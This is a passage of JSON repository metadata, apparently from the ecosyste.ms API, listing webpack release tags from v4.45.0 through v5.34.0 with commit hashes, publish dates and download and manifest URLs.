tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5